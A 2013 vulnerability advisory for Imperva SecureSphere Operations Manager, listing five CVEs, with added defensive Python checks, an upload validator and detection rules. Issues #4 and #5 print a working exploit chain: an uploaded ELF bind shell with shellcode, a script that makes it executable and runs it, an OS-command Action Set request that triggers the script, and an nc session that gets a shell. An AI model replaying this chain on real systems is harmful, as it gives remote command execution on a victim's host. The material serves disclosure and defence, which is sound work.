Imperva-SecureSphere.OptMgr.txt
===============================
- Advisory -
===============================
Title: Imperva SecureSphere Operations Manager - Multiple Issues
Risk: High
Date: 27.May.2013
Author: Pedro Andujar
Twitter: @pandujar
.: [ INTRO ] :.
SecureSphere Operations Manager (SOM) is a multi-domain, federated management solution that dramatically improves the operational
efficiency of managing SecureSphere deployments with multiple MX Management Servers. SOM meets the operational scalability
demands of large enterprises and Managed Security Service Providers by consolidating the management, visibility and reporting
across multiple SecureSphere MX Management Servers, and provides system wide health metrics and statistics.
.: [ TECHNICAL DESCRIPTION ] :.
Imperva SecureSphere Operations Manager version 9.0.0.5 Enterprise Edition, and probably other versions, is prone to several security issues,
as described below:
.: [ ISSUE #1 ] :.
Name: Autocomplete attribute not disabled in login page
Severity: Low
CVE: CVE-2013-4091
AUTOCOMPLETE is not disabled on the /secsphLogin.jsp page, so nothing prevents the web browser from caching the username and j_password fields.
<tr> <td style="width: 120px"> <h1 class="login">User:</h1> </td> <td>
<input size=30 id="username" type='text' name='j_username' style="width:172px" value="andujarp" />
<script>document.getElementById("username").focus()</script>
</td> </tr> <tr>
<td style="width: 120px">
<h1 class="login">Password:</h1>
</td> <td>
<input size=30 type='password' name='j_password' style="width:172px"/>
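Added example, not code from the advisory: a stand-alone Python check that parses a login form and reports the credential fields a browser is free to remember, i.e. those without autocomplete="off" on the input itself or on its enclosing form. The two HTML fragments are constructed for the check; the first mirrors the markup quoted above, the second is the same form with the attribute set.

```python
from html.parser import HTMLParser

# Constructed login page fragments for this check. The first mirrors the
# advisory's /secsphLogin.jsp markup (no autocomplete attribute anywhere);
# the second is the same form with autocomplete="off" as the mitigation.
VULNERABLE_LOGIN_HTML = """
<form method="post" action="/SecureSphere/j_acegi_security_check">
<input size=30 id="username" type='text' name='j_username' style="width:172px" />
<input size=30 type='password' name='j_password' style="width:172px"/>
</form>
"""

HARDENED_LOGIN_HTML = """
<form method="post" action="/SecureSphere/j_acegi_security_check" autocomplete="off">
<input size=30 id="username" type='text' name='j_username' autocomplete="off" />
<input size=30 type='password' name='j_password' autocomplete="off" />
</form>
"""


class LoginFormAuditor(HTMLParser):
    """Collect credential-bearing <input> elements and record whether the
    element or its enclosing <form> disables autocomplete."""

    def __init__(self):
        super().__init__()
        self.form_autocomplete_off = False
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self.form_autocomplete_off = a.get("autocomplete", "").lower() == "off"
            return
        if tag != "input":
            return
        itype = a.get("type", "text").lower()
        name = a.get("name", "")
        # Password fields, and the username field paired with them, are what
        # a browser offers to remember.
        if itype == "password" or "user" in name.lower():
            field_off = a.get("autocomplete", "").lower() == "off"
            self.findings.append({
                "name": name,
                "type": itype,
                "autocomplete_off": field_off or self.form_autocomplete_off,
            })

    def handle_endtag(self, tag):
        if tag == "form":
            self.form_autocomplete_off = False


def audit_login_page(html: str) -> list:
    """Return the names of credential fields the browser is free to cache."""
    parser = LoginFormAuditor()
    parser.feed(html)
    parser.close()
    return [f["name"] for f in parser.findings if not f["autocomplete_off"]]


if __name__ == "__main__":
    print("vulnerable page:", audit_login_page(VULNERABLE_LOGIN_HTML))
    print("hardened page:  ", audit_login_page(HARDENED_LOGIN_HTML))
```

Current browsers largely ignore autocomplete="off" on password fields, so the attribute is a hygiene item for shared workstations rather than a control that reliably stops credential storage; the server-side findings in the later issues matter far more.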
.: [ ISSUE #2 ] :.
Name: Sensitive information is passed as parameter in URL
Severity: Low
CVE: CVE-2013-4092
As part of the login process, the assigned session ID is revealed as a URL parameter.
GET /SecureSphere/secsphLogin.jsp;jsessionid=8B4AE9F3C99049824D4AEBBF61DEF6A5 HTTP/1.1
Additionally, some credentials are revealed as URL parameters when trying to get the details of a sensor device:
GET /SecureSphere/j_acegi_security_check?j_password=5352023200062562773&j_username=SOM-user&remote_login_attempt=true&active_mom_user=andujarp
.: [ ISSUE #3 ] :.
Name: Physical Path Disclosure
Severity: Low
CVE: CVE-2013-4093
The SecureSphere web application discloses sensitive system information, including file path information, through its exposed functionality.
Specifically, the /SecureSphere/dwr/call/plaincall/AsyncOperationsContainer.getOperationState.dwr URL shows the internal
root path of the underlying Application Server:
HTTP/1.1 200 OK
Content-type: text/javascript;charset=utf-8
Content-Length: 554
Date: Thu, 25 Oct 2013 04:41:38 GMT
Server: NA
throw 'allowScriptTagRemoting is false.';
//#DWR-INSERT
//#DWR-REPLY
var s0={};var s1=[];s0['file_size']="412 KB";s0.filePath="/opt/SecureSphere/server/SecureSphere/jakarta-tomcat-secsph/webapps/SecureSphere/WEB-INF/reptempt/25CB2F79E342E89AD9A7CFF51AA17F10/1338152502622932642/export.imf"
See also ISSUE #4, where additional file path disclosure occurs.
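Added example covering issues #2 and #3, not code from the advisory: a small Python scanner that flags session identifiers and credential parameters carried in a request URL, and absolute server filesystem paths appearing in a response body. The sample request lines and the DWR-style body are constructed from the fragments quoted in these two issues (the directory hashes are replaced by an EXAMPLE placeholder); the parameter-name lists are assumptions a reviewer would tune to the application under test.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed samples modelled on the request lines and the DWR reply quoted
# in issues #2 and #3 (directory hashes replaced by an EXAMPLE placeholder).
SAMPLE_REQUEST_LINES = [
    "GET /SecureSphere/secsphLogin.jsp;jsessionid=8B4AE9F3C99049824D4AEBBF61DEF6A5 HTTP/1.1",
    "GET /SecureSphere/j_acegi_security_check?j_password=5352023200062562773"
    "&j_username=SOM-user&remote_login_attempt=true HTTP/1.1",
    "GET /SecureSphere/ui/main.html HTTP/1.1",
]

SAMPLE_RESPONSE_BODY = (
    "throw 'allowScriptTagRemoting is false.';\n"
    "var s0={};var s1=[];s0['file_size']=\"412 KB\";"
    "s0.filePath=\"/opt/SecureSphere/server/SecureSphere/jakarta-tomcat-secsph/"
    "webapps/SecureSphere/WEB-INF/reptempt/EXAMPLE/export.imf\""
)

# Assumed parameter names; extend with the application's own field names.
CREDENTIAL_PARAMS = {"j_password", "password", "passwd", "pwd", "secret", "token"}
SESSION_PARAMS = {"jsessionid", "sessionid", "phpsessid", "sid"}
# Unix absolute paths under common roots, or Windows drive paths.
ABS_PATH_RE = re.compile(r"/(?:opt|var|etc|usr|home|srv|tmp)/[\w./-]+|[A-Za-z]:\\[\w\\.-]+")


def scan_request_line(line: str) -> list:
    """Flag session identifiers and credentials carried in the request URL.

    Returns (finding, parameter-name) pairs; the values themselves are not
    copied into the result so the scanner output can be logged safely.
    """
    parts = line.split()
    if len(parts) < 2:
        return []
    findings = []
    split = urlsplit(parts[1])
    # Servlet path parameters (";jsessionid=...") sit in the path, not the query.
    _, _, matrix = split.path.partition(";")
    for kv in filter(None, matrix.split(";")):
        key = kv.split("=", 1)[0].lower()
        if key in SESSION_PARAMS:
            findings.append(("session-id-in-url", key))
    for key in parse_qs(split.query, keep_blank_values=True):
        if key.lower() in CREDENTIAL_PARAMS:
            findings.append(("credential-in-url", key))
        elif key.lower() in SESSION_PARAMS:
            findings.append(("session-id-in-url", key))
    return findings


def scan_response_body(body: str) -> list:
    """Return the distinct absolute filesystem paths disclosed in a body."""
    return sorted(set(ABS_PATH_RE.findall(body)))


if __name__ == "__main__":
    for line in SAMPLE_REQUEST_LINES:
        print(line.split()[1][:60], "->", scan_request_line(line))
    print("paths in body:", scan_response_body(SAMPLE_RESPONSE_BODY))
```

Both checks run equally well over a proxy log or a saved HAR file; the point is that URLs end up in browser history, proxy and server access logs, and Referer headers, so a session ID or password placed there is copied somewhere it was never meant to go.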
.: [ ISSUE #4 ] :.
Name: Insufficient checks on file upload
Severity: High
CVE: CVE-2013-4094
The SecureSphere web application's file upload functionality in the "Key Management" section doesn't provide adequate security controls over the uploaded
files, thus allowing an external attacker to upload arbitrary content into the server. This can be used by an attacker in combination with additional
vulnerabilities in the application to compromise the host.
When trying to upload an invalid file in the Key Management section, the application shows the full internal path of the application server. Additionally,
it effectively uploads the file, despite it being of the wrong file type.
The example below shows the file upload functionality returning an error once the file has been uploaded, additionally revealing the upload filename and its
internal path within the system. A Linux x86_64 ELF port 2222 bind shell and an additional shell script are uploaded to the /var/tmp directory:
POST /SecureSphere/plain/settings.html?__targetView=details&extraParams[Key]=T/keyManagement HTTP/1.1
Host: x.x.x.x:8083
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: https://x.x.x.x:8083/SecureSphere/ui/main.html
Cookie: JSESSIONID=CBAD5B77716363AFC961614AC32CAD4D
Content-Type: multipart/form-data; boundary=---------------------------6997088307399657971245517506
Content-Length: 1011
-----------------------------6997088307399657971245517506
Content-Disposition: form-data; name="def_name"
default_key_pair_fips_2
-----------------------------6997088307399657971245517506
Content-Disposition: form-data; name="private_key"; filename="bndsh"
Content-Type: application/octet-stream
ELF > x@@@8 @@$ j)Xj _j ^HR $ ziHj Zj1Xj2XH1j+XHj ^Hj!Xuj;XH/bin/shSHRWH
-----------------------------6997088307399657971245517506
Content-Disposition: form-data; name="public_key"; filename="script"
Content-Type: application/octet-stream
file file* | grep ELF | awk '{print $1}' | sed -e 's/://' >target.file ; chmod 755 `cat target.file` ; ./`cat target.file` ; rm -rf target.file
-----------------------------6997088307399657971245517506
Content-Disposition: form-data; name="password"
12321323
-----------------------------6997088307399657971245517506----------------------------------------------------
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/xml;charset=UTF-8
Content-Language: en
Content-Length: 315
Date: Fri, 26 Oct 2012 04:38:17 GMT
Server: NA
<errors> <global-errors> <global-error path="page">
An error occurred while importing keys: Failed to load PEM key from '/var/tmp/com.mprv.secsph.utils.io1217840423292804321upload.file'..</global-error>
</global-errors> <field-errors> </field-errors> </errors>
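Added example, not Imperva's code: how the Key Management upload could have failed closed. The upload is validated entirely in memory, as a single PEM block of the expected type with a well-formed base64 body and a DER SEQUENCE inside, before anything is written to disk, and the error returned to the client carries no temporary filename or server path. The PEM samples, the size limit and the error wording are constructed for the example; the tiny key body is a placeholder DER structure, not a real key.

```python
import base64
import binascii
import re

# Constructed limit for this example; real PEM keys and certificates are a few KB.
MAX_KEY_BYTES = 16 * 1024

# One PEM block: BEGIN line, base64 body lines, END line with the same label.
# Encapsulated headers such as "Proc-Type: 4,ENCRYPTED" are deliberately not
# accepted here to keep the example short.
PEM_BLOCK_RE = re.compile(
    rb"-----BEGIN ((?:RSA |EC |ENCRYPTED )?PRIVATE KEY|PUBLIC KEY|CERTIFICATE)-----\r?\n"
    rb"((?:[A-Za-z0-9+/=]{1,76}\r?\n)+)"
    rb"-----END \1-----\r?\n?"
)


class KeyImportError(ValueError):
    """Error whose message is safe to return to the client: no temp file
    names, no server paths, no parser internals."""


def validate_pem_upload(data: bytes, expected_label: str) -> bytes:
    """Validate an uploaded key entirely in memory and return its DER bytes.

    Nothing touches the filesystem: the handler described in the advisory
    wrote the upload to /var/tmp first and validated afterwards, which is
    the order to avoid.
    """
    if len(data) > MAX_KEY_BYTES:
        raise KeyImportError("uploaded key exceeds the maximum allowed size")
    # PEM is 7-bit text; NUL bytes or an ELF magic mean this is not a key.
    if b"\x00" in data or data.startswith(b"\x7fELF"):
        raise KeyImportError("uploaded file is not a PEM-encoded key")
    m = PEM_BLOCK_RE.fullmatch(data.strip() + b"\n")
    if m is None:
        raise KeyImportError("uploaded file is not a PEM-encoded key")
    label = m.group(1).decode("ascii")
    if expected_label not in label:
        raise KeyImportError(f"expected a {expected_label}, got a {label}")
    try:
        der = base64.b64decode(b"".join(m.group(2).split()), validate=True)
    except binascii.Error:
        raise KeyImportError("key body is not valid base64") from None
    # Every PEM key/cert body is a DER SEQUENCE (tag 0x30); anything else is junk.
    if not der.startswith(b"\x30"):
        raise KeyImportError("key body is not a DER-encoded structure")
    return der


def import_key_upload(data: bytes, expected_label: str) -> tuple:
    """Controller-level wrapper: (ok, message) as reported back to the UI."""
    try:
        der = validate_pem_upload(data, expected_label)
    except KeyImportError as exc:
        return (False, f"An error occurred while importing keys: {exc}")
    return (True, f"imported {expected_label} ({len(der)} DER bytes)")


# Constructed inputs: a placeholder PEM whose body is a minimal DER SEQUENCE
# (not a real key), an ELF-looking blob and a shell script, i.e. the kinds of
# content the advisory shows the real handler accepting.
GOOD_PEM = b"-----BEGIN PRIVATE KEY-----\nMAMCAQA=\n-----END PRIVATE KEY-----\n"
ELF_UPLOAD = b"\x7fELF\x02\x01\x01" + b"\x00" * 9
SCRIPT_UPLOAD = b"file file* | grep ELF | awk '{print $1}'\n"

if __name__ == "__main__":
    for name, blob in [("pem", GOOD_PEM), ("elf", ELF_UPLOAD), ("script", SCRIPT_UPLOAD)]:
        print(name, import_key_upload(blob, "PRIVATE KEY"))
```

In a real handler the returned DER would be passed to the crypto library's key loader as the final check; what this example fixes is the ordering (validate, then persist) and the error channel (a fixed message to the client, the details only to the server log).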
.: [ ISSUE #5 ] :.
Name: Insufficient checks on Action Set (OS command)
Severity: High
CVE: CVE-2013-4095
The SecureSphere web application allows users to create Action Sets via the Policies sub-menu. Action Sets are components used to define the actions taken
by SecureSphere when specific conditions are met. Action sets include session blocks, SNMP traps, system logs, email, FTP Archive, OS Command, etc. An
attacker can control the execution of commands by creating a task, setting an OS command action on assignee change and cycling through commands by continuous
modification of the task assignee. The OS command action allows the user to supply very limited commands and arguments to the server host and have these
commands executed within the context of the "mxserver" user. The application host is running a modified version of Red Hat Linux, with many networking and
scripting tools installed by default. Due to insufficient host hardening and application sandboxing, an attacker is able to execute commands. Combining this with the
file upload vulnerability explained in issue 4, an attacker can copy a backdoor into the server filesystem and get it executed through this issue, opening
shell access to the host as the "mxserver" user. The attacker is able to use this foothold on the host to elevate privileges, view and modify source code,
obtain system and application credentials, etc.
POST /SecureSphere/plain/actionsets.html HTTP/1.1
Host: x.x.x.x:8083
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.4.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
preffered_encoding: utf-8
Referer: https://x.x.x.x:8083/SecureSphere/ui/main.html
Content-Length: 5223
Cookie: JSESSIONID=ABD89957C38AD685A881670E31A7BF1A
Pragma: no-cache
Cache-Control: no-cache
__targetView=details&currentState=E/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].momSettingsComponent.addToNewMxs=true
&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionInterface=E/secsph/action-interface\0x5B@dn=\0x27OsCommandAI\0x27\0x5D
&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].name=rvshell&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map
[5143764432078707607].actionParams.ownerTable=E/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D,actions.map[5143764432078707607]&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\
0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map
[command].value=/usr/bin/find
&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[command].ownerTable=E/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D,
actions.map[5143764432078707607].actionParams&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[command]
.parameterMetadata=E/secsph/generic-action-interface-metadata\0x5B@dn=\0x27OsCommand\0x27\0x5D,interfaceParameters.map[command]&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\
0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[command].name=command&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map
[5143764432078707607].actionParams.parameters.map
[arguments].value=-name file\* -exec sh {} \;
&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[arguments].ownerTable=E/secsph/action-set\0x5B@dn=\0x271914115513\0x27\
0x5D,actions.map[5143764432078707607].actionParams&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[arguments]
.parameterMetadata=E/secsph/generic-action-interface-metadata\0x5B@dn=\0x27OsCommand\0x27\0x5D,interfaceParameters.map[arguments]&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\
0x5D].actions.map[5143764432078707607].actionParams.parameters.map[arguments].name=arguments&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map
[workingDir].value=/var/tmp
&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[workingDir].ownerTable=E/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D,actions.map[5143764432078707607].actionParams&data
[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[workingDir].parameterMetadata=E/secsph/generic-action-interface-metadata\0x5B
@dn=\0x27OsCommand\0x27\0x5D,interfaceParameters.map[workingDir]&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[workingDir]
.name=workingDir&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[shouldRunAlways].value=true&data[actionsets][/secsph/action-set\0x5B
@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[shouldRunAlways].ownerTable=E/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D,actions
.map[5143764432078707607].actionParams&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[shouldRunAlways]
.parameterMetadata=E/secsph/generic-action-interface-metadata\0x5B@dn=\0x27OsCommand\0x27\0x5D,interfaceParameters.map[shouldRunAlways]&data[actionsets][/secsph/action-set\0x5B@dn=
\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[shouldRunAlways].name=shouldRunAlways&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D]
.actions.map[5143764432078707607].ownerTable=E/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D&_=
In the example above, we have set an event action set, and as soon as the event happens it will launch the predefined action (/usr/bin/find . -exec sh {}),
which will execute sh over all the files existing in /var/tmp. As we were able to upload arbitrary content into the local filesystem by means of
issue 4, the following script that was previously uploaded will be executed as well:
file file* | grep ELF | awk '{print $1}' | sed -e 's/://' >target.file ; chmod 755 `cat target.file` ; ./`cat target.file` ; rm -rf target.file
The script will find, rename and execute the bind TCP shell that was uploaded before, giving us access to an interactive Linux shell on port 2222
with the privileges of mxserver.
[crg@fogheaven ~]$ nc x.x.x.x 2222
uname -a;id
Linux xxxxx.xxxx.xx 2.6.18-164.15.1.el5.impl #1 SMP Tue Apr 27 20:46:55 IDT 2010 x86_64 x86_64 x86_64 GNU/Linux
uid=502(mxserver)gid=505(mxserver)groups=505(mxservers)
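Added detection example, not from the advisory: Python rules run over constructed process-execution events, modelled on the chain described in issues #4 and #5, that flag find(1) handing files to a shell, a shell whose parent is find, a service account making a file under a scratch directory executable, and a program executed from /var/tmp. The JSON-lines format, the field names and the mxserver service-account list are assumptions; the events are illustrative and were not captured from a real host.

```python
import json
import os
import shlex

# Constructed process-execution events (one JSON object per line, in the shape
# of an EDR or auditd export). Field names, timestamps and paths are
# illustrative and were not captured from a real host. The first four events
# follow the find -> sh -> chmod -> /var/tmp binary chain the advisory
# describes; the last two are benign maintenance activity that must not fire.
SAMPLE_EVENTS = """\
{"ts":"2012-10-26T04:40:01Z","user":"mxserver","parent":"java","exe":"/usr/bin/find","args":"/usr/bin/find -name file* -exec sh {} ;","cwd":"/var/tmp"}
{"ts":"2012-10-26T04:40:01Z","user":"mxserver","parent":"find","exe":"/bin/sh","args":"sh ./file1","cwd":"/var/tmp"}
{"ts":"2012-10-26T04:40:02Z","user":"mxserver","parent":"sh","exe":"/bin/chmod","args":"chmod 755 com.mprv.secsph.utils.ioEXAMPLEupload.file","cwd":"/var/tmp"}
{"ts":"2012-10-26T04:40:02Z","user":"mxserver","parent":"sh","exe":"/var/tmp/com.mprv.secsph.utils.ioEXAMPLEupload.file","args":"./com.mprv.secsph.utils.ioEXAMPLEupload.file","cwd":"/var/tmp"}
{"ts":"2012-10-26T04:45:00Z","user":"mxserver","parent":"java","exe":"/usr/bin/find","args":"/usr/bin/find /opt/SecureSphere/logs -name *.log -mtime +7 -delete","cwd":"/opt/SecureSphere"}
{"ts":"2012-10-26T04:46:00Z","user":"root","parent":"cron","exe":"/bin/sh","args":"sh /etc/cron.daily/logrotate","cwd":"/"}
"""

SHELLS = {"sh", "bash", "dash", "ksh"}
SCRATCH_DIRS = ("/var/tmp/", "/tmp/", "/dev/shm/")
# Assumed: the accounts the application's Action Set commands run under.
SERVICE_ACCOUNTS = {"mxserver"}
FIND_EXEC_FLAGS = {"-exec", "-execdir", "-ok", "-okdir"}


def detect(event: dict) -> list:
    """Return the names of every rule the event triggers."""
    try:
        argv = shlex.split(event["args"])
    except ValueError:  # unbalanced quotes in a real log line
        argv = event["args"].split()
    exe = event["exe"]
    exe_name = os.path.basename(exe)
    hits = []
    # Rule 1: find(1) handing matched files to a shell interpreter.
    if exe_name == "find" and any(
        tok in FIND_EXEC_FLAGS and i + 1 < len(argv)
        and os.path.basename(argv[i + 1]) in SHELLS
        for i, tok in enumerate(argv)
    ):
        hits.append("find-exec-shell")
    # Rule 2: a shell whose parent process is find.
    if exe_name in SHELLS and event.get("parent") == "find":
        hits.append("shell-spawned-by-find")
    # Rule 3: a service account making something in a scratch directory executable.
    if exe_name == "chmod" and event.get("user") in SERVICE_ACCOUNTS:
        operands = [t for t in argv[1:] if not t.startswith("-")]
        for target in operands[1:]:  # operands[0] is the mode
            if os.path.normpath(os.path.join(event["cwd"], target)).startswith(SCRATCH_DIRS):
                hits.append("chmod-in-scratch-dir")
                break
    # Rule 4: a program executed from a world-writable scratch directory.
    if exe.startswith(SCRATCH_DIRS):
        hits.append("exec-from-scratch-dir")
    return hits


def scan_events(text: str) -> dict:
    """Map line index -> triggered rules for every event that fires a rule."""
    results = {}
    for i, line in enumerate(text.splitlines()):
        if line.strip():
            hits = detect(json.loads(line))
            if hits:
                results[i] = hits
    return results


if __name__ == "__main__":
    for idx, rules in scan_events(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```

Rule 4 on its own is the strongest signal here and is also the one that a mount option fixes at the host: /var/tmp and /tmp mounted noexec would have stopped the uploaded binary from running at all, which is the host-hardening gap the advisory points at. The other three rules catch the Action Set misuse even when the payload lands somewhere else.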
.: [ CHANGELOG ] :.
* 25/Oct/2012: - Audit done, reported to client.
* 27/May/2013: - Sent to Imperva.
* 02/Jun/2013: - Public Disclosure.
.: [ SOLUTIONS ] :.
N/A
.: [ REFERENCES ] :.
[+] Imperva SecureSphere Operations Manager
http://www.imperva.com/products/mgt_operations-manager.html
[+] Security Target Document
http://www.niap-ccevs.org/st/st_vid10466-st.pdf
[+] !dSR - Digital Security Research
http://www.digitalsec.net/
-=EOF=-